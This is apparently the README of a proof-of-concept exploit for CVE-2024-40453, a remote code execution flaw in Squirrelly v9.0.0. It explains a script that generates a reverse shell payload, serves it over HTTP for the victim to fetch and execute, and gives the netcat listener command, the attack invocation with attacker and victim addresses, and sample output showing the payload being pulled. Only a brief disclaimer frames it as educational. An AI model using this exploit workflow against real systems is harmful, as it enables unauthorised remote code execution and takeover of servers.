CVE-2024-40453 - Squirrelly v9.0.0 RCE. Poc# CVE-2024-40453 - Squirrelly v9.0.0 RCE
## Disclaimer:
This script is for educational use only.
Do not use it for illegal purposes.
If you do, it’s entirely your responsibility; I am not liable for any misuse.
## Description
This script creates a reverse shell called `payload.sh` in the current directory.
Then it hosts an http server on port 80 for the victim to pull the `payload.sh` from.
A listener needs to be started on the attackers machine.
The http server shutdowns after 3 seconds to allow the victim to pull and execute the `payload.sh`
## EXPLANATION OF EXPLOIT
Based on the following information, this POC was developed.
https://samuzora.com/posts/cve-2024-40453
## USAGE
Start your listener
```
rlwrap nc -nvlp 3000
```
Execute the payload
```
# python3 poc.py -rhost <VICTIM_IP> -rport <VICTIM_PORT> -lhost <ATTACKER_IP> -lport <ATTACKER_LISTENER_PORT>
python3 poc.py -rhost 172.16.0.2 -rport 3000 -lhost 172.16.0.1 -lport 3000
[+] Payload created at payload.sh
[*] Hosting HTTP server on port 80
[*] Triggering remote execution
172.16.0.2 - - [13/Jun/2025 22:21:10] "GET /payload.sh HTTP/1.1" 200 -
[*] Shutting down HTTP server on port 80
[!] Check your listener!
```
[4.0K] /data/pocs/47de78375badf64922caf485f123a456b068a2a3
├── [2.3K] poc.py
└── [1.2K] README.md
0 directories, 2 files